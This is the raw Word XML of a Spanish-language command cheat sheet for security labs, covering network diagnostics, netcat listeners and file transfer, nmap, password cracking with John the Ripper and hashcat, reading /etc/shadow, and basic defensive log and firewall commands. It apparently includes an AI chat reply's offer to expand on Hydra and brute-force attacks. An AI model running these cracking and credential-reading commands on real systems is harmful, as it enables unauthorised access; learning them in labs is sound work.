        <w:t>ping 8.8.8.8 (DNS google)</w:t>
      </w:r>
      <w:r w:rsidR="00AF589F">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AF589F">
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AF589F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E684D41" wp14:editId="22686CA4">
            <wp:extent cx="5391150" cy="3000375"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1149190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1903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2A26" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="369063CC">
          <v:rect id="_x0000_i1055" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFEB884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30. Ver ruta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEB2D46" w14:textId="2D1E5E40" w:rsidR="00834E03" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>traceroute google.com</w:t>
      </w:r>
      <w:r w:rsidR="00AF589F">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AF589F">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AF589F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="121A170A" wp14:editId="0B1335FD">
            <wp:extent cx="5400040" cy="3092450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1782310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102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2F41" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="5C5159BB">
          <v:rect id="_x0000_i1056" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BECEA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31. IP local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010A5781" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>ip a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A06E59" w14:textId="25B6C819" w:rsidR="00834E03" w:rsidRPr="00206562" w:rsidRDefault="00834E03" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="702738FA" wp14:editId="22CF47C3">
            <wp:extent cx="5400040" cy="1915160"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="644077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778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8EE3" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="37EC45DB">
          <v:rect id="_x0000_i1057" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1035559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32. Gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69212687" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>ip route</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374D0CEE" w14:textId="7F2AE579" w:rsidR="00D6247B" w:rsidRPr="00206562" w:rsidRDefault="00D6247B" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BB250E9" wp14:editId="5D3E53FE">
            <wp:extent cx="5400040" cy="884555"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="984699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998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EB1B" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="7E40C41D">
          <v:rect id="_x0000_i1058" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7B4399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33. DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DD27CA" w14:textId="5AF96607" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:lastRenderedPageBreak/>
        <w:t>cat /etc/resolv.conf</w:t>
      </w:r>
      <w:r w:rsidR="005D1380">
        <w:br/>
      </w:r>
      <w:r w:rsidR="005D1380">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C322CBB" wp14:editId="4BEABBA1">
            <wp:extent cx="3009900" cy="2667000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1348107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0747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229C">
        <w:br/>
      </w:r>
      <w:r w:rsidR="006C229C" w:rsidRPr="006C229C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CCBEE17" wp14:editId="2679B023">
            <wp:extent cx="2743583" cy="1476581"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="163487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7029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C36BD" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="15B07969">
          <v:rect id="_x0000_i1059" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADCE00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34. Test DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568A5D0E" w14:textId="6102AD75" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:lastRenderedPageBreak/>
        <w:t>nslookup google.com</w:t>
      </w:r>
      <w:r w:rsidR="006C229C">
        <w:br/>
      </w:r>
      <w:r w:rsidR="006C229C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EC54BE7" wp14:editId="31FDB410">
            <wp:extent cx="2943225" cy="4305300"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="835241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2418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229C">
        <w:br/>
      </w:r>
      <w:r w:rsidR="005D1380">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1520C1FF" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="2E2E61C6">
          <v:rect id="_x0000_i1060" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BF1A4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35. Alternativa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52609419" w14:textId="02A576FF" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:lastRenderedPageBreak/>
        <w:t>dig google.com</w:t>
      </w:r>
      <w:r w:rsidR="006C229C">
        <w:br/>
      </w:r>
      <w:r w:rsidR="006C229C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20D2D8C0" wp14:editId="43B83358">
            <wp:extent cx="5400040" cy="3959860"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="1122008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0819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E6FA7" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="4469BE59">
          <v:rect id="_x0000_i1061" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AE3B1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36. Escuchar puerto (netcat)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471D26D6" w14:textId="154BA8FA" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>nc -lvp 4444</w:t>
      </w:r>
      <w:r w:rsidR="00D63B9C">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D63B9C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="129E2A59" wp14:editId="58CB5104">
            <wp:extent cx="4552950" cy="1371600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1054310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1079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CDC03" w14:textId="2D56813E" w:rsidR="00D63B9C" w:rsidRPr="00206562" w:rsidRDefault="00D63B9C" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AA8F526" wp14:editId="6ED19389">
            <wp:extent cx="2924175" cy="1381125"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="961259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5935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BEE7" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="27B838DF">
          <v:rect id="_x0000_i1062" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B13719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37. Conectar a puerto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FAA21A" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:lastRenderedPageBreak/>
        <w:t>nc 192.168.1.1 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112981E9" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="616A8300">
          <v:rect id="_x0000_i1063" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00697F8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38. Transferir archivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4EBE4D" w14:textId="127F9DEB" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>nc -lvp 4444 &gt; archivo.txt</w:t>
      </w:r>
      <w:r w:rsidR="00E965EF">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00E965EF">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00E965EF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44D9EFA7" wp14:editId="72C4A6BD">
            <wp:extent cx="5400040" cy="4460875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1300164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6483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6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2C3" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="4E30757C">
          <v:rect id="_x0000_i1064" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7190658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39. Ver ARP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B94D5F2" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>arp -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BBCA11" w14:textId="419FD376" w:rsidR="00F95E98" w:rsidRPr="00206562" w:rsidRDefault="00F95E98" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B803BB2" wp14:editId="717EEFBB">
            <wp:extent cx="4505325" cy="3914775"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="67214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415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8B58" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="3417F1C3">
          <v:rect id="_x0000_i1065" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4E6E0E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40. Escaneo con timeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E10D0B" w14:textId="229F575B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nmap --host-timeout 30s 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="00F95E98">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F95E98">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>69</w:t>
      </w:r>
      <w:r w:rsidR="00F95E98">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00261931">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55E70743" wp14:editId="220175C3">
            <wp:extent cx="5400040" cy="3175000"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1910549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4931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1F83" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="15A285E8">
          <v:rect id="_x0000_i1066" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCBA721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lastRenderedPageBreak/>
        <w:t>🔓</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> BLOQUE 3: CRACKING Y PASSWORDS (41–60)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED75BDB" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="16F7D460">
          <v:rect id="_x0000_i1067" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EBA33E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41. John the Ripper básico</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E274AF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john hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A364BF" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="3C9B181A">
          <v:rect id="_x0000_i1068" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="715CC0E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42. Mostrar resultados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6290F4" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>john --show hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765FAB7E" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="24F88440">
          <v:rect id="_x0000_i1069" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F42EC38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43. Usar wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556D0C77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john --wordlist=rockyou.txt hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53840F31" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="6CF646D1">
          <v:rect id="_x0000_i1070" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C479C1A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44. Descomprimir wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323C47FF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gunzip rockyou.txt.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA2BE1A" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="3F07A946">
          <v:rect id="_x0000_i1071" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7763DBA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45. Generar hash MD5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEFCC86" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>echo -n "1234" | md5sum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26860593" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="23F5CB42">
          <v:rect id="_x0000_i1072" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E90AA8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46. SHA256</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEAB385" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>echo -n "1234" | sha256sum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF5AAE4" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="27835AE0">
          <v:rect id="_x0000_i1073" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A9C1CC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47. Hashcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267C8833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hashcat -m 0 hash.txt rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1281E53F" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="75420A2E">
          <v:rect id="_x0000_i1074" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4457C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48. Tipos de hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E79E53" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>hashid hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B17865" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="018D7981">
          <v:rect id="_x0000_i1075" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="676494E7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49. Crear usuario vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B1566F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lastRenderedPageBreak/>
        <w:t>useradd test</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br/>
        <w:t>passwd test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664DA51B" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="2B7B07D5">
          <v:rect id="_x0000_i1076" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC3F34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50. Ver hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37587E93" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>cat /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FCA571" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="29E8322D">
          <v:rect id="_x0000_i1077" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F63CA4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51–60 (resumen rápido)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6254B52D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uso de hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B76B04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ataques SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25917955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diccionario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E8758A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fuerza bruta web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F209CB" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00206562">
        <w:t>hash cracking avanzado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286EA8B5" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>(Si quieres, te desarrollo estos con herramientas concretas tipo Hydra, Burp, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384AFA2D" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="4BD9A560">
          <v:rect id="_x0000_i1078" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6C62B2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t>🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> BLOQUE 4: BLUE TEAM (61–80)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C13120A" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="77AA3ED5">
          <v:rect id="_x0000_i1079" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A7FF7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61. Ver logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72017A55" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>cat /var/log/auth.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBF0EDB" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="59396990">
          <v:rect id="_x0000_i1080" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A9CAB0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62. Buscar intentos fallidos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD1A7B1" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>grep "Failed password" /var/log/auth.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1AFE67" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="0A93A0A4">
          <v:rect id="_x0000_i1081" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="399E8BBC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63. Ver conexiones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12638EBB" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>ss -tunap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106750D6" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="5C86798F">
          <v:rect id="_x0000_i1082" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6694DE5B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64. Instalar firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7823473C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sudo apt install ufw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C70C480" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="2DF255D1">
          <v:rect id="_x0000_i1083" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2F5E82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65. Activar firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D496C61" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>sudo ufw enable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CFA632" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="44D2F7DC">
          <v:rect id="_x0000_i1084" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D27A7CE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66. Permitir SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155D42EF" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>sudo ufw allow 22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DD8E09" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="6C7B90F4">
          <v:rect id="_x0000_i1085" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
